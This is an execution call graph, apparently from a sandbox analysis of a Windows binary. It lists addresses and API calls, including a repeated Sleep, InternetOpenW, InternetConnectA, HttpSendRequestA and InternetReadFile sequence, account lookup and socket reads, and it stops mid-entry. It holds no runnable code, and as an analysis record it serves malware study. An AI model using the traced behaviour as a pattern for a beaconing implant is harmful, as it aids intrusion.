                                                                                                                                                                                                                                                execution_graph 12224 4cb92e 12229 4cb7b5 12224->12229 12226 4cb956 12237 4cb718 12226->12237 12228 4cb96f 12230 4cb7c1 Concurrency::details::_Reschedule_chore 12229->12230 12231 4cc6ac GetSystemTimePreciseAsFileTime 12230->12231 12233 4cb7f2 12230->12233 12232 4cb7d6 12231->12232 12247 4b2b10 12232->12247 12233->12226 12235 4cb7dc __Mtx_unlock 12236 4b2b10 4 API calls 12235->12236 12236->12233 12238 4cb724 Concurrency::details::_Reschedule_chore 12237->12238 12239 4cc6ac GetSystemTimePreciseAsFileTime 12238->12239 12240 4cb77e 12238->12240 12241 4cb739 12239->12241 12240->12228 12242 4b2b10 4 API calls 12241->12242 12243 4cb73f __Mtx_unlock 12242->12243 12244 4b2b10 4 API calls 12243->12244 12245 4cb75c __Cnd_broadcast 12244->12245 12245->12240 12246 4b2b10 4 API calls 12245->12246 12246->12240 12248 4b2b1a 12247->12248 12249 4b2b1c 12247->12249 12248->12235 12250 4cc26a 4 API calls 12249->12250 12251 4b2b22 12250->12251 12252 4e38af ___std_exception_copy RtlAllocateHeap 12251->12252 12253 4b2b68 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 12252->12253 12253->12235 12254 4e6629 12255 4e64c7 __cftof 2 API calls 12254->12255 12256 4e663a 12255->12256 11114 4e6a44 11115 4e6a5c 11114->11115 11116 4e6a52 11114->11116 11121 4e698d 11115->11121 11118 4e6a76 11124 4e68ed 11118->11124 11120 4e6a83 ___free_lconv_mon 11127 4e690a 11121->11127 11123 4e699f 11123->11118 11189 4e683b 11124->11189 11126 4e6905 11126->11120 11128 4e692a 11127->11128 11132 4e6921 11127->11132 11128->11132 11133 4eb5fb 11128->11133 11132->11123 11134 4e6960 11133->11134 11135 4eb60e 11133->11135 11137 4eb628 11134->11137 11135->11134 11141 4ef5ab 11135->11141 11138 4eb63b 11137->11138 11140 4eb650 11137->11140 11138->11140 11172 4ee6b1 11138->11172 11140->11132 11142 4ef5b7 __cftof 11141->11142 11143 4ef606 11142->11143 11146 4e8bec 11142->11146 11143->11134 11145 4ef62b 11147 4e8bf1 __cftof 11146->11147 11150 4e8bfc __cftof 11147->11150 11152 4ed634 11147->11152 11157 4e65ed 11150->11157 11151 4e8c2f __cftof __dosmaperr 11151->11145 11153 4ed640 __cftof 11152->11153 11154 4e65ed __cftof 2 API calls 11153->11154 11155 4ed69c __cftof __dosmaperr 11153->11155 11156 4ed82e __cftof __dosmaperr 11154->11156 11155->11150 11156->11150 11160 4e64c7 11157->11160 11161 4e64d5 __cftof 11160->11161 11162 4e6520 11161->11162 11165 4e652b 11161->11165 11162->11151 11170 4ea302 GetPEB 11165->11170 11167 4e6535 11168 4e653a GetPEB 11167->11168 11169 4e654a __cftof 11167->11169 11168->11169 11171 4ea31c __cftof 11170->11171 11171->11167 11173 4ee6bb 11172->11173 11176 4ee5c9 11173->11176 11175 4ee6c1 11175->11140 11180 4ee5d5 __cftof ___free_lconv_mon 11176->11180 11177 4ee5f6 11177->11175 11178 4e8bec __cftof 2 API calls 11179 4ee668 11178->11179 11181 4ee6a4 11179->11181 11185 4ea72e 11179->11185 11180->11177 11180->11178 11181->11175 11186 4ea751 11185->11186 11187 4e8bec __cftof 2 API calls 11186->11187 11188 4ea7c7 11187->11188 11190 4e6863 11189->11190 11195 4e6849 __dosmaperr __fassign 11189->11195 11191 4e686a 11190->11191 11193 4e6889 __fassign 11190->11193 11191->11195 11196 4e69e6 11191->11196 11194 4e69e6 RtlAllocateHeap 11193->11194 11193->11195 11194->11195 11195->11126 11197 4e69f4 11196->11197 11200 4e6a25 11197->11200 11203 4eb04b 11200->11203 11202 4e6a05 11202->11195 11205 4eb087 __dosmaperr 11203->11205 11206 4eb059 __cftof 11203->11206 11204 4eb074 RtlAllocateHeap 11204->11205 11204->11206 11205->11202 11206->11204 11206->11205 12014 4be500 12015 4be525 12014->12015 12017 4be509 12014->12017 12017->12015 12018 4be360 12017->12018 12019 4be370 __dosmaperr 12018->12019 12020 4e8ab6 3 API calls 12019->12020 12021 4be3ad 12020->12021 12026 4cc199 12021->12026 12029 4cc0e9 12026->12029 12028 4cc1aa std::_Throw_future_error 12030 4b22e0 std::future_error::future_error RtlAllocateHeap 12029->12030 12031 4cc0fb 12030->12031 12031->12028 12284 4be0c0 recv 12285 4be122 recv 12284->12285 12286 4be157 recv 12285->12286 12288 4be191 12286->12288 12287 4be2b3 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 12288->12287 12289 4cc6ac GetSystemTimePreciseAsFileTime 12288->12289 12290 4be2ee 12289->12290 12291 4cc26a 4 API calls 12290->12291 12292 4be358 12291->12292 12375 4bc8e0 12376 4bc937 12375->12376 12381 4c8de0 12376->12381 12378 4bc94c 12379 4c8de0 RtlAllocateHeap 12378->12379 12380 4bc988 shared_ptr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 12379->12380 12382 4c8f2f 12381->12382 12383 4c8e05 12381->12383 12384 4c9270 RtlAllocateHeap 12382->12384 12387 4c8e4c 12383->12387 12388 4c8e76 12383->12388 12385 4c8f34 12384->12385 12386 4b2480 RtlAllocateHeap 12385->12386 12392 4c8e5d shared_ptr __cftof 12386->12392 12387->12385 12389 4c8e57 12387->12389 12390 4cd3e2 RtlAllocateHeap 12388->12390 12388->12392 12391 4cd3e2 RtlAllocateHeap 12389->12391 12390->12392 12391->12392 12392->12378 12458 4b9580 12459 4b95d4 12458->12459 12460 4c80c0 RtlAllocateHeap 12459->12460 12461 4b961c 12460->12461 12462 4c7a00 RtlAllocateHeap 12461->12462 12472 4b9635 shared_ptr 12462->12472 12463 4b979f 12465 4b97fe 12463->12465 12466 4b98e0 12463->12466 12464 4c7a00 RtlAllocateHeap 12464->12472 12468 4c80c0 RtlAllocateHeap 12465->12468 12469 4c8200 RtlAllocateHeap 12466->12469 12467 4b5c10 4 API calls 12467->12472 12470 4b9834 shared_ptr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 12468->12470 12469->12470 12471 4c80c0 RtlAllocateHeap 12471->12472 12472->12463 12472->12464 12472->12466 12472->12467 12472->12470 12472->12471 12473 4b8780 12474 4b8786 12473->12474 12475 4b87a6 12474->12475 12478 4e67b7 12474->12478 12477 4b87a0 12479 4e67c3 __cftof 12478->12479 12481 4e67cd __cftof __dosmaperr 12479->12481 12482 4e6740 12479->12482 12481->12477 12483 4e6762 12482->12483 12485 4e674d __cftof __dosmaperr ___free_lconv_mon 12482->12485 12483->12485 12486 4ea038 12483->12486 12485->12481 12487 4ea050 12486->12487 12489 4ea075 12486->12489 12487->12489 12490 4f0439 12487->12490 12489->12485 12491 4f0445 __cftof 12490->12491 12493 4f044d __cftof __dosmaperr 12491->12493 12494 4f052b 12491->12494 12493->12489 12495 4f054d 12494->12495 12497 4f0551 __cftof __dosmaperr 12494->12497 12495->12497 12498 4efcc0 12495->12498 12497->12493 12499 4efd0d 12498->12499 12500 4e690a __cftof 3 API calls 12499->12500 12504 4efd1c __cftof 12500->12504 12501 4effbc __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 12501->12497 12502 4eb67d 2 API calls 12502->12504 12503 4ec719 GetPEB GetPEB RtlAllocateHeap __fassign 12503->12504 12504->12501 12504->12502 12504->12503 12546 4bb1a0 12547 4bb1f2 12546->12547 12548 4c80c0 RtlAllocateHeap 12547->12548 12549 4bb233 12548->12549 12550 4c7a00 RtlAllocateHeap 12549->12550 12551 4bb2dd 12550->12551 12293 4c79c0 12294 4c79e0 12293->12294 12294->12294 12295 4c80c0 RtlAllocateHeap 12294->12295 12296 4c79f2 12295->12296 12297 4c83c0 12298 4c7760 RtlAllocateHeap 12297->12298 12299 4c8439 12298->12299 12300 4c8f40 RtlAllocateHeap 12299->12300 12301 4c8454 12299->12301 12300->12301 12302 4c8f40 RtlAllocateHeap 12301->12302 12304 4c84a8 12301->12304 12303 4c84ee 12302->12303 12393 4c88e0 12394 4c8ac7 12393->12394 12396 4c8936 12393->12396 12395 4c91e0 RtlAllocateHeap 12394->12395 12404 4c898d shared_ptr 12395->12404 12397 4c8ac2 12396->12397 12398 4c897c 12396->12398 12399 4c89a3 12396->12399 12400 4b2480 RtlAllocateHeap 12397->12400 12398->12397 12401 4c8987 12398->12401 12403 4cd3e2 RtlAllocateHeap 12399->12403 12399->12404 12400->12394 12402 4cd3e2 RtlAllocateHeap 12401->12402 12402->12404 12403->12404 12405 4c93e0 12406 4c93f5 12405->12406 12412 4c9433 12405->12412 12413 4cd111 12406->12413 12415 4cd121 12413->12415 12414 4c93ff 12414->12412 12417 4cd64e 12414->12417 12415->12414 12424 4cd199 12415->12424 12428 4cd621 12417->12428 12420 4cd0c7 12421 4cd0d7 12420->12421 12422 4cd17f 12421->12422 12423 4cd17b RtlWakeAllConditionVariable 12421->12423 12422->12412 12423->12412 12425 4cd1a7 SleepConditionVariableCS 12424->12425 12427 4cd1c0 12424->12427 12425->12427 12427->12415 12429 4cd637 12428->12429 12430 4cd630 12428->12430 12437 4e98fa 12429->12437 12434 4e988e 12430->12434 12433 4c9429 12433->12420 12435 4e98fa RtlAllocateHeap 12434->12435 12436 4e98a0 12435->12436 12436->12433 12440 4e9630 12437->12440 12439 4e992b 12439->12433 12441 4e963c __cftof 12440->12441 12444 4e968b 12441->12444 12443 4e9657 12443->12439 12445 4e96a7 12444->12445 12449 4e9714 __cftof ___free_lconv_mon 12444->12449 12448 4e96f4 ___free_lconv_mon 12445->12448 12445->12449 12450 4eedf6 12445->12450 12447 4eedf6 RtlAllocateHeap 12447->12449 12448->12447 12448->12449 12449->12443 12451 4eee03 12450->12451 12453 4eee0f __cftof __dosmaperr 12451->12453 12454 4f500f 12451->12454 12453->12448 12455 4f501c 12454->12455 12457 4f5024 __cftof __dosmaperr ___free_lconv_mon 12454->12457 12456 4eb04b __cftof RtlAllocateHeap 12455->12456 12456->12457 12457->12453 12552 4cb8b9 12553 4cb7b5 5 API calls 12552->12553 12555 4cb8e1 Concurrency::details::_Reschedule_chore 12553->12555 12554 4cb906 12557 4cb718 5 API calls 12554->12557 12555->12554 12559 4ccbae 12555->12559 12558 4cb91e 12557->12558 12560 4ccbcc 12559->12560 12561 4ccbbc TpCallbackUnloadDllOnCompletion 12559->12561 12560->12554 12561->12560 11070 4b7430 11083 4c7a00 11070->11083 11072 4b7465 11073 4c7a00 RtlAllocateHeap 11072->11073 11074 4b7478 11073->11074 11075 4c7a00 RtlAllocateHeap 11074->11075 11076 4b7488 11075->11076 11077 4c7a00 RtlAllocateHeap 11076->11077 11078 4b749d 11077->11078 11079 4c7a00 RtlAllocateHeap 11078->11079 11080 4b74b2 11079->11080 11081 4c7a00 RtlAllocateHeap 11080->11081 11082 4b74c4 shared_ptr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 11081->11082 11084 4c7a26 11083->11084 11085 4c7a2d 11084->11085 11086 4c7a81 11084->11086 11087 4c7a62 11084->11087 11085->11072 11092 4cd3e2 RtlAllocateHeap 11086->11092 11093 4c7a6f __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ __Cnd_unregister_at_thread_exit 11086->11093 11088 4c7ab9 11087->11088 11089 4c7a69 11087->11089 11102 4b2480 11088->11102 11094 4cd3e2 11089->11094 11092->11093 11093->11072 11096 4cd3e7 __cftof 11094->11096 11097 4cd401 11096->11097 11098 4b2480 std::_Throw_future_error 11096->11098 11106 4e8be1 11096->11106 11097->11093 11101 4cd40d std::_Throw_future_error 11098->11101 11110 4e38af 11098->11110 11100 4b24c3 11100->11093 11101->11093 11103 4b248e std::_Throw_future_error 11102->11103 11104 4e38af ___std_exception_copy RtlAllocateHeap 11103->11104 11105 4b24c3 11104->11105 11105->11093 11109 4eb04b __cftof 11106->11109 11107 4eb074 RtlAllocateHeap 11108 4eb087 __dosmaperr 11107->11108 11107->11109 11108->11096 11109->11107 11109->11108 11111 4e38bc 11110->11111 11113 4e38d9 ___std_exception_destroy ___std_exception_copy 11110->11113 11112 4e8be1 ___std_exception_copy RtlAllocateHeap 11111->11112 11111->11113 11112->11113 11113->11100 12257 4b9230 12258 4b9284 12257->12258 12259 4c80c0 RtlAllocateHeap 12258->12259 12260 4b92cc 12259->12260 12261 4c7a00 RtlAllocateHeap 12260->12261 12264 4b92e5 shared_ptr 12261->12264 12262 4b944f 12265 4c80c0 RtlAllocateHeap 12262->12265 12263 4c7a00 RtlAllocateHeap 12263->12264 12264->12262 12264->12263 12266 4b5c10 4 API calls 12264->12266 12267 4b94c6 shared_ptr 12264->12267 12269 4c80c0 RtlAllocateHeap 12264->12269 12265->12267 12266->12264 12268 4b9543 shared_ptr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 12267->12268 12270 4c8200 RtlAllocateHeap 12267->12270 12269->12264 12271 4b9578 12270->12271 12272 4b8b30 12273 4b8b7c 12272->12273 12274 4c7a00 RtlAllocateHeap 12273->12274 12275 4b8b8c 12274->12275 12276 4b5c10 4 API calls 12275->12276 12277 4b8b97 12276->12277 12278 4c80c0 RtlAllocateHeap 12277->12278 12279 4b8be3 12278->12279 12280 4c80c0 RtlAllocateHeap 12279->12280 12281 4b8c35 12280->12281 12282 4c8220 RtlAllocateHeap 12281->12282 12283 4b8c47 shared_ptr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 12282->12283 12505 4b7990 12506 4c7a00 RtlAllocateHeap 12505->12506 12507 4b79db 12506->12507 12508 4b5c10 4 API calls 12507->12508 12509 4b79e3 12508->12509 12510 4c8320 RtlAllocateHeap 12509->12510 12511 4b79f3 12510->12511 12512 4c7a00 RtlAllocateHeap 12511->12512 12513 4b7a0e 12512->12513 12514 4b5c10 4 API calls 12513->12514 12515 4b7a15 12514->12515 12516 4c80c0 RtlAllocateHeap 12515->12516 12518 4b7a38 shared_ptr 12516->12518 12517 4b7aa5 shared_ptr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 12518->12517 12539 4b6d70 12518->12539 12520 4b7b1b shared_ptr 12521 4c7a00 RtlAllocateHeap 12520->12521 12538 4b7c06 shared_ptr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 12520->12538 12522 4b7b75 12521->12522 12523 4b5c10 4 API calls 12522->12523 12524 4b7b7d 12523->12524 12525 4c7a00 RtlAllocateHeap 12524->12525 12526 4b7b98 12525->12526 12527 4b5c10 4 API calls 12526->12527 12528 4b7ba0 12527->12528 12529 4c8320 RtlAllocateHeap 12528->12529 12530 4b7bb1 12529->12530 12531 4c8220 RtlAllocateHeap 12530->12531 12532 4b7bc1 12531->12532 12533 4c7a00 RtlAllocateHeap 12532->12533 12534 4b7bdc 12533->12534 12535 4b5c10 4 API calls 12534->12535 12536 4b7be3 12535->12536 12537 4c80c0 RtlAllocateHeap 12536->12537 12537->12538 12540 4b6db0 12539->12540 12541 4b6dca 12540->12541 12542 4b6df5 12540->12542 12543 4c80c0 RtlAllocateHeap 12541->12543 12544 4c80c0 RtlAllocateHeap 12542->12544 12545 4b6deb shared_ptr 12543->12545 12544->12545 12545->12520 12563 4b91b0 12564 4b91e5 12563->12564 12565 4c80c0 RtlAllocateHeap 12564->12565 12566 4b9218 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 12565->12566 11207 4c6c70 11210 4c6ca0 11207->11210 11208 4b5c10 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 11208->11210 11209 4c7a00 RtlAllocateHeap 11209->11210 11210->11208 11210->11209 11213 4c47b0 11210->11213 11212 4c6cec Sleep 11212->11210 11214 4c47eb 11213->11214 11326 4c4e70 shared_ptr 11213->11326 11216 4c7a00 RtlAllocateHeap 11214->11216 11214->11326 11215 4c4f59 shared_ptr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 11215->11212 11217 4c480c 11216->11217 11474 4b5c10 11217->11474 11219 4c4813 11221 4c7a00 RtlAllocateHeap 11219->11221 11223 4c4825 11221->11223 11222 4c5015 11581 4b6950 11222->11581 11225 4c7a00 RtlAllocateHeap 11223->11225 11226 4c4837 11225->11226 11481 4bbe30 11226->11481 11228 4c4843 11231 4c7a00 RtlAllocateHeap 11228->11231 11229 4c50de shared_ptr 11591 4b7d30 11229->11591 11234 4c4858 11231->11234 11232 4c50ed 11670 4b45b0 11232->11670 11233 4c5025 shared_ptr 11233->11229 11255 4c6c46 11233->11255 11236 4c7a00 RtlAllocateHeap 11234->11236 11238 4c4870 11236->11238 11237 4c50fa 11674 4b8380 11237->11674 11240 4b5c10 4 API calls 11238->11240 11242 4c4877 11240->11242 11241 4c5106 11243 4b45b0 RtlAllocateHeap 11241->11243 11505 4b8580 11242->11505 11246 4c5113 11243->11246 11245 4c4883 11247 4c7a00 RtlAllocateHeap 11245->11247 11332 4c4afd 11245->11332 11252 4b45b0 RtlAllocateHeap 11246->11252 11249 4c489f 11247->11249 11248 4c7a00 RtlAllocateHeap 11250 4c4b2f 11248->11250 11253 4c7a00 RtlAllocateHeap 11249->11253 11254 4c7a00 RtlAllocateHeap 11250->11254 11251 4c7a00 RtlAllocateHeap 11251->11255 11256 4c5130 11252->11256 11257 4c48b7 11253->11257 11258 4c4b44 11254->11258 11255->11251 11259 4b5c10 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 11255->11259 11267 4c47b0 13 API calls 11255->11267 11260 4c7a00 RtlAllocateHeap 11256->11260 11262 4b5c10 4 API calls 11257->11262 11263 4c7a00 RtlAllocateHeap 11258->11263 11259->11255 11261 4c514e 11260->11261 11264 4b5c10 4 API calls 11261->11264 11265 4c48be 11262->11265 11266 4c4b56 11263->11266 11269 4c5155 11264->11269 11270 4b8580 RtlAllocateHeap 11265->11270 11271 4bbe30 10 API calls 11266->11271 11268 4c6cec Sleep 11267->11268 11268->11255 11272 4c7a00 RtlAllocateHeap 11269->11272 11273 4c48ca 11270->11273 11274 4c4b62 11271->11274 11275 4c516a 11272->11275 11278 4c7a00 RtlAllocateHeap 11273->11278 11273->11332 11276 4c7a00 RtlAllocateHeap 11274->11276 11277 4b5c10 4 API calls 11275->11277 11279 4c4b77 11276->11279 11287 4c5171 11277->11287 11280 4c48e7 11278->11280 11281 4c7a00 RtlAllocateHeap 11279->11281 11282 4b5c10 4 API calls 11280->11282 11283 4c4b8f 11281->11283 11289 4c48ef 11282->11289 11284 4b5c10 4 API calls 11283->11284 11285 4c4b96 11284->11285 11286 4b8580 RtlAllocateHeap 11285->11286 11288 4c4ba2 11286->11288 11292 4c80c0 RtlAllocateHeap 11287->11292 11290 4c7a00 RtlAllocateHeap 11288->11290 11288->11326 11511 4c80c0 11289->11511 11293 4c4bbe 11290->11293 11298 4c51ed 11292->11298 11294 4c7a00 RtlAllocateHeap 11293->11294 11295 4c4bd6 11294->11295 11297 4b5c10 4 API calls 11295->11297 11296 4c7a00 RtlAllocateHeap 11299 4c49e6 11296->11299 11300 4c4bdd 11297->11300 11686 4c7de0 11298->11686 11303 4b5c10 4 API calls 11299->11303 11304 4b8580 RtlAllocateHeap 11300->11304 11301 4c4959 shared_ptr 11301->11296 11310 4c49ee 11303->11310 11306 4c4be9 11304->11306 11305 4c5259 11699 4c7760 11305->11699 11309 4c7a00 RtlAllocateHeap 11306->11309 11306->11326 11308 4c52b8 11317 4c5335 shared_ptr 11308->11317 11711 4c8ca0 11308->11711 11311 4c4c06 11309->11311 11312 4c80c0 RtlAllocateHeap 11310->11312 11313 4b5c10 4 API calls 11311->11313 11315 4c4a49 shared_ptr 11312->11315 11316 4c4c0e 11313->11316 11315->11332 11524 4b98f0 11315->11524 11318 4c4c5a 11316->11318 11319 4c4f97 11316->11319 11324 4c80c0 RtlAllocateHeap 11317->11324 11322 4c80c0 RtlAllocateHeap 11318->11322 11551 4c8200 11319->11551 11330 4c4c78 shared_ptr 11322->11330 11323 4c4f9c 11554 4cc1d9 11323->11554 11336 4c53fd shared_ptr 11324->11336 11326->11215 11557 4b65e0 11326->11557 11327 4c4ad5 __dosmaperr 11327->11332 11529 4e8ab6 11327->11529 11328 4c7a00 RtlAllocateHeap 11331 4c4d05 11328->11331 11330->11326 11330->11328 11334 4b5c10 4 API calls 11331->11334 11332->11248 11332->11323 11333 4b45b0 RtlAllocateHeap 11335 4c549d 11333->11335 11340 4c4d0d 11334->11340 11337 4c7a00 RtlAllocateHeap 11335->11337 11336->11333 11338 4c54b7 11337->11338 11339 4b5c10 4 API calls 11338->11339 11341 4c54c2 11339->11341 11342 4c80c0 RtlAllocateHeap 11340->11342 11343 4b45b0 RtlAllocateHeap 11341->11343 11348 4c4d68 shared_ptr 11342->11348 11344 4c54d7 11343->11344 11345 4c7a00 RtlAllocateHeap 11344->11345 11347 4c54eb 11345->11347 11346 4c7a00 RtlAllocateHeap 11349 4c4df7 11346->11349 11350 4b5c10 4 API calls 11347->11350 11348->11326 11348->11346 11351 4c7a00 RtlAllocateHeap 11349->11351 11352 4c54f6 11350->11352 11353 4c4e0c 11351->11353 11354 4c7a00 RtlAllocateHeap 11352->11354 11356 4c7a00 RtlAllocateHeap 11353->11356 11355 4c5514 11354->11355 11357 4b5c10 4 API calls 11355->11357 11358 4c4e27 11356->11358 11360 4c551f 11357->11360 11359 4b5c10 4 API calls 11358->11359 11361 4c4e2e 11359->11361 11362 4c7a00 RtlAllocateHeap 11360->11362 11365 4c80c0 RtlAllocateHeap 11361->11365 11363 4c553d 11362->11363 11364 4b5c10 4 API calls 11363->11364 11366 4c5548 11364->11366 11367 4c4e67 11365->11367 11368 4c7a00 RtlAllocateHeap 11366->11368 11533 4c4390 11367->11533 11370 4c5566 11368->11370 11371 4b5c10 4 API calls 11370->11371 11372 4c5571 11371->11372 11373 4c7a00 RtlAllocateHeap 11372->11373 11374 4c558f 11373->11374 11375 4b5c10 4 API calls 11374->11375 11376 4c559a 11375->11376 11377 4c7a00 RtlAllocateHeap 11376->11377 11378 4c55b8 11377->11378 11379 4b5c10 4 API calls 11378->11379 11380 4c55c3 11379->11380 11381 4c7a00 RtlAllocateHeap 11380->11381 11382 4c55e1 11381->11382 11383 4b5c10 4 API calls 11382->11383 11384 4c55ec 11383->11384 11385 4c7a00 RtlAllocateHeap 11384->11385 11386 4c560a 11385->11386 11387 4b5c10 4 API calls 11386->11387 11388 4c5615 11387->11388 11389 4c7a00 RtlAllocateHeap 11388->11389 11390 4c5631 11389->11390 11391 4b5c10 4 API calls 11390->11391 11392 4c563c 11391->11392 11393 4c7a00 RtlAllocateHeap 11392->11393 11394 4c5653 11393->11394 11395 4b5c10 4 API calls 11394->11395 11396 4c565e 11395->11396 11397 4c7a00 RtlAllocateHeap 11396->11397 11398 4c5675 11397->11398 11399 4b5c10 4 API calls 11398->11399 11400 4c5680 11399->11400 11401 4c7a00 RtlAllocateHeap 11400->11401 11402 4c569c 11401->11402 11403 4b5c10 4 API calls 11402->11403 11404 4c56a7 11403->11404 11723 4c8320 11404->11723 11406 4c56bb 11727 4c8220 11406->11727 11408 4c56cf 11409 4c8220 RtlAllocateHeap 11408->11409 11410 4c56e3 11409->11410 11411 4c8220 RtlAllocateHeap 11410->11411 11412 4c56f7 11411->11412 11413 4c8320 RtlAllocateHeap 11412->11413 11414 4c570b 11413->11414 11415 4c8220 RtlAllocateHeap 11414->11415 11416 4c571f 11415->11416 11417 4c8320 RtlAllocateHeap 11416->11417 11418 4c5733 11417->11418 11419 4c8220 RtlAllocateHeap 11418->11419 11420 4c5747 11419->11420 11421 4c8320 RtlAllocateHeap 11420->11421 11422 4c575b 11421->11422 11423 4c8220 RtlAllocateHeap 11422->11423 11424 4c576f 11423->11424 11425 4c8320 RtlAllocateHeap 11424->11425 11426 4c5783 11425->11426 11427 4c8220 RtlAllocateHeap 11426->11427 11428 4c5797 11427->11428 11429 4c8320 RtlAllocateHeap 11428->11429 11430 4c57ab 11429->11430 11431 4c8220 RtlAllocateHeap 11430->11431 11432 4c57bf 11431->11432 11433 4c8320 RtlAllocateHeap 11432->11433 11434 4c57d3 11433->11434 11435 4c8220 RtlAllocateHeap 11434->11435 11436 4c57e7 11435->11436 11437 4c8320 RtlAllocateHeap 11436->11437 11438 4c57fb 11437->11438 11439 4c8220 RtlAllocateHeap 11438->11439 11440 4c580f 11439->11440 11441 4c8320 RtlAllocateHeap 11440->11441 11442 4c5823 11441->11442 11443 4c8220 RtlAllocateHeap 11442->11443 11444 4c5837 11443->11444 11445 4c8220 RtlAllocateHeap 11444->11445 11446 4c584b 11445->11446 11447 4c8220 RtlAllocateHeap 11446->11447 11448 4c585f 11447->11448 11449 4c8320 RtlAllocateHeap 11448->11449 11452 4c5873 shared_ptr 11449->11452 11450 4c665b 11454 4c7a00 RtlAllocateHeap 11450->11454 11451 4c6507 11453 4c7a00 RtlAllocateHeap 11451->11453 11452->11450 11452->11451 11455 4c651d 11453->11455 11456 4c6670 11454->11456 11457 4b5c10 4 API calls 11455->11457 11458 4c7a00 RtlAllocateHeap 11456->11458 11459 4c6528 11457->11459 11460 4c6685 11458->11460 11461 4c8320 RtlAllocateHeap 11459->11461 11735 4b49a0 11460->11735 11473 4c653c shared_ptr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 11461->11473 11463 4c6694 11464 4c7760 RtlAllocateHeap 11463->11464 11471 4c66db 11464->11471 11465 4c67d6 11466 4c7a00 RtlAllocateHeap 11465->11466 11467 4c67ec 11466->11467 11468 4b5c10 4 API calls 11467->11468 11470 4c67f7 11468->11470 11469 4c8ca0 RtlAllocateHeap 11469->11471 11472 4c8220 RtlAllocateHeap 11470->11472 11471->11465 11471->11469 11472->11473 11473->11212 11742 4b5940 11474->11742 11478 4b5c6a 11761 4b4b30 11478->11761 11480 4b5c7b shared_ptr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 11480->11219 11482 4bbe82 11481->11482 11483 4bc281 11481->11483 11482->11483 11485 4bbe96 Sleep InternetOpenW InternetConnectA 11482->11485 11484 4c80c0 RtlAllocateHeap 11483->11484 11490 4bc22e shared_ptr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 11484->11490 11486 4c7a00 RtlAllocateHeap 11485->11486 11487 4bbf18 11486->11487 11488 4b5c10 4 API calls 11487->11488 11489 4bbf23 HttpOpenRequestA 11488->11489 11492 4bbf4c shared_ptr 11489->11492 11490->11228 11493 4c7a00 RtlAllocateHeap 11492->11493 11494 4bbfb4 11493->11494 11495 4b5c10 4 API calls 11494->11495 11496 4bbfbf 11495->11496 11497 4c7a00 RtlAllocateHeap 11496->11497 11498 4bbfd8 11497->11498 11499 4b5c10 4 API calls 11498->11499 11500 4bbfe3 HttpSendRequestA 11499->11500 11503 4bc006 shared_ptr 11500->11503 11502 4bc08e InternetReadFile 11504 4bc0b5 11502->11504 11503->11502 11509 4b85d5 shared_ptr 11505->11509 11510 4b86a0 shared_ptr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 11505->11510 11506 4b8767 11508 4c8200 RtlAllocateHeap 11506->11508 11507 4c80c0 RtlAllocateHeap 11507->11509 11508->11510 11509->11506 11509->11507 11509->11510 11510->11245 11512 4c8104 11511->11512 11515 4c80de 11511->11515 11516 4c817d 11512->11516 11517 4c8158 11512->11517 11522 4c8169 11512->11522 11513 4c9270 RtlAllocateHeap 11514 4c81f3 11513->11514 11518 4b2480 RtlAllocateHeap 11514->11518 11515->11301 11521 4cd3e2 RtlAllocateHeap 11516->11521 11516->11522 11517->11514 11520 4cd3e2 RtlAllocateHeap 11517->11520 11519 4c81f8 11518->11519 11520->11522 11521->11522 11522->11513 11523 4c81d0 shared_ptr 11522->11523 11523->11301 11525 4c7a00 RtlAllocateHeap 11524->11525 11526 4b991e 11525->11526 11527 4b5c10 4 API calls 11526->11527 11528 4b9927 shared_ptr __cftof __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 11527->11528 11528->11327 11530 4e8ad1 11529->11530 11829 4e8868 11530->11829 11532 4e8adb 11532->11332 11534 4c7a00 RtlAllocateHeap 11533->11534 11535 4c43d2 11534->11535 11536 4c7a00 RtlAllocateHeap 11535->11536 11537 4c43e4 11536->11537 11538 4b8580 RtlAllocateHeap 11537->11538 11539 4c43ed 11538->11539 11540 4c4646 11539->11540 11550 4c43f8 shared_ptr 11539->11550 11541 4c7a00 RtlAllocateHeap 11540->11541 11542 4c4657 11541->11542 11543 4c7a00 RtlAllocateHeap 11542->11543 11544 4c466c 11543->11544 11545 4c7a00 RtlAllocateHeap 11544->11545 11548 4c4610 shared_ptr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 11545->11548 11547 4c80c0 RtlAllocateHeap 11547->11550 11548->11326 11549 4c7a00 RtlAllocateHeap 11549->11550 11550->11547 11550->11548 11550->11549 11835 4c9280 11550->11835 11552 4cc1d9 RtlAllocateHeap 11551->11552 11553 4c820a 11552->11553 11553->11323 11852 4cc15d 11554->11852 11556 4cc1ea std::_Throw_future_error 11556->11326 11580 536027a 11557->11580 11558 4b663f LookupAccountNameA 11559 4b6692 11558->11559 11560 4c7a00 RtlAllocateHeap 11559->11560 11561 4b66a6 11560->11561 11562 4b5c10 4 API calls 11561->11562 11563 4b66b1 11562->11563 11855 4b22c0 11563->11855 11565 4b66c9 shared_ptr 11566 4c7a00 RtlAllocateHeap 11565->11566 11578 4b68e3 shared_ptr __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 11565->11578 11567 4b6732 11566->11567 11568 4b5c10 4 API calls 11567->11568 11569 4b673d 11568->11569 11570 4b22c0 3 API calls 11569->11570 11579 4b6757 shared_ptr 11570->11579 11571 4b6852 11572 4c80c0 RtlAllocateHeap 11571->11572 11574 4b689c 11572->11574 11573 4c7a00 RtlAllocateHeap 11573->11579 11575 4c80c0 RtlAllocateHeap 11574->11575 11575->11578 11576 4b5c10 4 API calls 11576->11579 11577 